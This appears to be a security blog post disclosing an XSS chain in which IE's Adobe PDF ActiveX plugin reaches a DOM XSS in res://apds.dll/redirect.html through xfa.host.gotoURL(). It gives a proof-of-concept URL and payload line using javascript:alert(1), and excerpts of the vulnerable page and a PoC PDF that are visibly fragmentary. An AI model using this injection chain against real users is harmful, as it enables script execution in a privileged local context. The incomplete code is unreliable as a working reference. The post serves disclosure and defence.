~# n0tr00t Security Team

From http:// domain to res:// domain xss by using IE Adobe’s PDF ActiveX plugin

10 Mar 2019 - superhei

[+] Author: superhei
[+] Team: n0tr00t security team
[+] From: https://www.n0tr00t.com
[+] Create: 2019-03-19

0x01 res://apds.dll/redirect.html dom xss

https://bugs.chromium.org/p/project-zero/issues/detail?id=1598&desc=5 had reported an xss vulnerability in res://apds.dll/redirect.html. And this vulnerability has not been fixed until now.

This vulnerability is a typical dom xss vulnerability form the res://apds.dll/redirect.html code:

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" >
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
    <script type="text/javascript">
        var targetParamRegex = /[\?\&]target=([^\&\#]+)/i;
        var targetResults = targetParamRegex.exec(window.location.search);
        if (targetResults) {

POC: res://apds.dll/redirect.html?target=javascript:alert(1)

0x02 from http:// domain to res:// domain

Usually accessing res:// resources via http:// domain is not allowed. The Javascript function xfa.host.gotoURL() in Adobe PDF can access multiple URLs include http(s):// file:// etc. Of course, in general, there will be security tips when you open the PDF files.

But when we use xfa.host.gotoURL() to access res:// or http(s):// by IE Adobe’s PDF ActiveX plugin :

     xfa.host.gotoURL("res://apds.dll/redirect.html?target=javascript:alert(1);//"); There are no security alerts. and the xss payload "alert(1)" is executed.



r.pdf code:

1 0 obj

2 0 obj <<>>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">

    <subform name="a">

  /Pages <<>>
      /XFA 2 0 R

0x03 fixed?

Due to some security domain isolation of IE, the harm of res:// domain xss is limited. But I think Microsoft should actively fix the res://apds.dll/redirect.html xss vulnerability, and Adobe should disable or give corresponding security warnings when URL redirect,The world can be more beautiful and harmonious!

0x04 Timeline